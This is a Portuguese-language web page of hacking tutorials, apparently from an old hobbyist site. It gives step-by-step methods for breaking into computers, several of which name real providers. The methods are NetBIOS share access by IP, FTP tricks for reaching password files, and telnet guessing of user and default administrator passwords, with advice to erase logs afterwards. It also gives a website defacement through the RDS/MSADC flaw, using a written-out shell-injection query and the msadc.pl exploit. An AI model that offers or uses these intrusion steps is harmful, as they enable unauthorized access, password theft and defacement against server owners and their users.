Total de visitas: 56886
|
Tipos de Invasão!
Invasao via Ip
1º PASSO - Veja se você possui o programa NBTSTAT;
2º PASSO - Vá ao PROMPT do DOS;
3º PASSO - Digite: NBTSTAT -a (IP DO CARA);
4º PASSO - Irá aparecer se o computador da pessoa tem compartilhamento de arquivos ou não. Se não tiver aparecerá HOST NOT FOUND.
5º PASSO - Se aparecer mensagens entre esta marca <03>, você deverá pegar aquele arquivo.
6º PASSO - Mapeie a sua unidade de disco para tornar as duas máquinas em uma só.
7º PASSO - No Windows vá em INICIAR, EXECUTAR e digite "//IPdocara e dê OK.
8º PASSO - Você invadiu por IP!!!!
Mas, não se esqueça NUNCA apague nem modifique nada,
apenas fusse e veja se encontra algo que lhe interessa e depois copie... OBs.: Alguns renomeiam o arquivo VNBT.386 no diretório windowssystem para não conseguirem te nukar ou te invadir...
Conselho, renomeie-o também.
Invasao via FTP
Primeira coisa que deve saber...
Não fique, em hipótese alguma mais de 5 mim,
senão é cadeia na certa, á não ser que a conta seja RACKEADA.
Siga os passos:
1º PASSO - No DOS digite FTP;
2º PASSO - Eu aconselho a digitar "?" para ver so comandos do FTP;
3º PASSO - Digite "open". Irá aparecer a mensagem "TO';
4º PASSO - Escolha um servidor de FTP (ftp.mandic.com.br, ftp.sol.com.br, ftp.plugnet.com.br, etc.);
5º PASSO - Espere conectar e digite "quote cwd~root" ou "quote cwd~sys';
6º PASSO - No PASSWORD coloque "quote pass ftp';
7º PASSO - Você vai entrar no diretório home/root, dê um "cd/etc';
8º PASSO - Pronto, você está no lugar certo, mas não se esqueça, as senhas são criptografadas, não adianta copiá-las, a não ser que tenha um programa para descriptografá-las.
OBs.: Alguns renomeiam o arquivo VNBT.386 no diretório windowssystem para não conseguirem te nukar ou te invadir... Conselho, renomeie-o também.
INVASAO VIA TELNET...
Ataque via Telnet é um dos poderosos, devido os comandos que a mesma aceita e também suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere), mas também tem sua "parte mal", você geralmente "cai" dos servidores "lentos" e também demora para enviar e receber os dígitos, por enquanto você digita ele demora um tempo para aparecer o que você digitou, ele não envia palavra por palavra, mas sim caracter por caracter, por isso a demora, mas mesmo assim, ele é fundamental para quem tá querendo alguma coisa boa...
Vamos ao ataque:
Entre na Home Page de algum servidor através de seu browser, e procure pela lista de home pages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo:
https://www.servidor.com.br/~usuário
Onde "usuário" é o login do dono da página. Se você usa o Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. Conecte-se ao host do servidor (Ex:www.plisnet.com.br). Então entre com o Login de um dos usuários (olhando na lista de home pages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex.: login: kurt senha: cobain).
Invasao Via Porta 666
Para invadir é fácil
vc deve ter um programa de conexão via telenet (telnet que já vem com o WIN95 ou similar)
e também um programa chamado aabout.
O q deve ser feito, este programa aabout deve ser acionado por ambas as partes (invasor e invadido)
e o q ele faz??
Bem, ele abre uma porta de conexão entre os dois CPUs via a porta 666.
Vc deve ligar o telenet colocar no rost o numero do IP da pessoa
e em port deve-se colocar 666. Bem vc já está conectado,
dai no login vc deve digita cg! (com o "!")
e dar um dir vendo tudo o q tem no CPU da outra pessoa
Roubando senhas
Cavalo de Tróia
O hacker infiltra em seu alvo um programa semelhante a um vírus. Mas, em lugar de destruir programas e arquivos, ele tem a função de descobrir senhas. O cavalo de Tróia pode ser enviado escondido numa mensagem na Internet ou num disquete que o hacker passa, com jogos ou outros programs, para usuários do computador que quer invadir. Cada vez que o usuário escreve nome e senha, o cavalo de Tróia grava os dados. Como é programado para se conectar com seu criador, por meio do modem, em dia e hora marcados, ele transmite os dados que copiou. Elementar, para quem conhece muito bem as linguagens do computador.
Farejamento de redes
Para acelerar a sua transmissão, os dados que entram nas redes, provenientes de vários computadores, são agrupados em pacotes. O hacker cria programas farejadores que monitoram a circulação desses pacotes nas redes e procuram neles palavras como password e senha. Quando encontra, o programa copia o pacote e o envia para o computador do hacker. Os dados chegam dificados, mas isso não é problema para ele, que, em geral conhece bem criptografia, o conjunto de técnicas que permite codificar dados.
Engenharia social
É uma espécie de espionagem. Senhas com datas de nascimento, sobrenome ou nome dos filhos são muito comuns. Se o hacker tiver acesso a essas informações do usuário, vai tentá-las, como primeira opção, para descobrir sua senha. Alguns chegam a arrumar emprego temporário na empresa que pretendem invadir. Lá dentro, prestam atenção nos computadores. Ninguém cobre o teclado na hora de digitar a senha. Mesmo que tenha alguém por perto. Esse alguém pode ser um hacker.
Quebra-cabeça
Um jeito simples de desvendar senhas é a velha tentativa e erro. Para isso, o hacker cria programas capazes de montar todo tipo de combinação de letras e números. O sistema funciona bem para senhas de até seis caracteres. O processo deve levar muito tempo, porque as tentativas precisam ser feitas em períodos curtos, com grandes intervalos (dias, se for possível) entre um e outro, para não despertar suspeitas. No Brasil é um método muito difundido, pois as senhas em geral são simples e dificilmente os computadores possuem sistema de proteção.
Invasão do servidor
O hacker pode se conectar via FTP anônimo ao servidor e baixar o arquivo que contém as passwords (ex. passwd). Com esse arquivo em mãos o hacker pode descriptografá-lo usando programas específicos. Dessa forma ele obtém praticamente (a descriptografação não é 100% eficiente) todas as passwords desse provedor.
Dedução
Um hacker pode usar a lógica para descobrir senhas de acesso. Ao invés de usar o quebra-cabeça que precisa testar milhares de combinações, o hacker faz a tentativa e erro manualmente com as senhas mais prováveis. Para isso ele dispõe de três dados fundamentais:
1. Cerca de 1 em cada 30 usuários usa o login como senha.
2. Muitos administradores usam a senha padrão do sistema.
3. A maioria das senhas está relacionada ao login.
Ex: login:kurt senha:cobain
Mãos à obra!
Chega de teorizar e vamos descobrir as senhas. Utilizaremos o último método por ser ele o mais simples. O penúltimo método também é descrito detalhadamente no FAQ alt.2600.
Entre na HomePage de algum servidor (experimente www.bhnet.com.br - bem fácil) e procure pela lista de homepages pessoais. Passando o mouse sobre os links que levam à página de cada usuário você pode perceber um padrão do tipo https://www.servidor.com.br/~usuário, onde usuário é o login do dono da página. Se você usa a bosta do Windows 95 vá ao prompt do MSDOS, digite telnet e tecle ENTER. Surgirá uma janela no Win95 com o programa Telnet. Se você usa outro sistema operacional, inicie seu programa de telnet. A vantagem da conexão via telnet é que suas tentativas de entrada não são registradas e você pode tentar quanto tempo quiser (mas nunca exagere). Conecte-se ao host do servidor (www.bhnet.com.br no nosso exemplo). Então entre com o Login de um dos usuários (olhando na lista de homepages) e use como senha esse mesmo login. Tente com todos os usuários. No final você deverá ter algumas senhas. Se você quiser mais senhas de usuários, utilize a lógica, relacionando a senha com o login (ex: login:kurt senha:cobain). Agora vem o próximo e mais valioso passo. Tentar pegar a senha do administrador. Para isso consulte o FAQ do alt.2600 e descubra quais são as senhas padrões para o administrador em cada sistema. Novamente usando telnet tente até achar ou desistir. Se você conseguir, vai ter acesso total ao servidor e terá hackeado o sistema! Mas cuidado ao usar a senha... você pode ser pego. Quando usar a senha do administrador, não esqueça de apagar os arquivos log ao sair. Veja o FAQ alt.2600 para saber o que são arquivos log, caso você não saiba.
Invasao por RDS
Obs.: Só funciona se o provedor usar Windows NT.
Essa porra é usado pra hackear paginas , pra isso vc precisa saber a pasta que se encontra o index ou default, bom na maioria dos casos é só digitar wwww.servidor.com/idq.idq, ai aparece a bosta do diretorio!, geralmente é c:InetPubwwwroot , bom ai tem que descobrir se o servidor usa index.asp,index.html,index.htm e mesma coisa com default.
Bom exemplo, como faço? assim, www.servidor.com/idq.idq ou ida.ida ou idc.idc, bom ai vou ver o diretorio.. anoto num txt, agora só decobrir se é index ou default e qual a extensão, bom só testando.. www.servidor.com/index.extenções possiveis ; ou www.servidor.com/default.exetenções possiveis , bom qual entrar é o certo ai é só anotar, vamos supor que o diretorio é : c:inetpubwwwrootindex.htm, ai depois de ter achado isso entra na tela do RDS, ou seja www.servidor.com/msadc/samples/adctest.asp, e vai aparecer a tela do RDS, agora apague tudo que tiver escrito no query e digite: Select * from Products where ProductType=\"|shell("cmd /c echo (O QUE QUER QUE APAREÇA NO SEU HACKED) > c:InetPubwwwrootindex.htm")|\" Depois é só apertar RUN e pronto!, agora vamos se por que vc quer evitar tudo isso, é so pegar um exploit chamado msadc.pl e pronto.. vc usa assim: perl msadc.pl -h www.servidor.com , se aparecer cmd , vc digita : (O que quer escrever) < C:InetPubwwwrootindex.htm (enter) só isso.
para ver se o servidor tem o bug do RDS é testando com o msadc/samples/adctest.asp ou passando um scaneador de vulneralidades!
(gosto do nessus pra linux),pega ele em www.nessus.org
|
|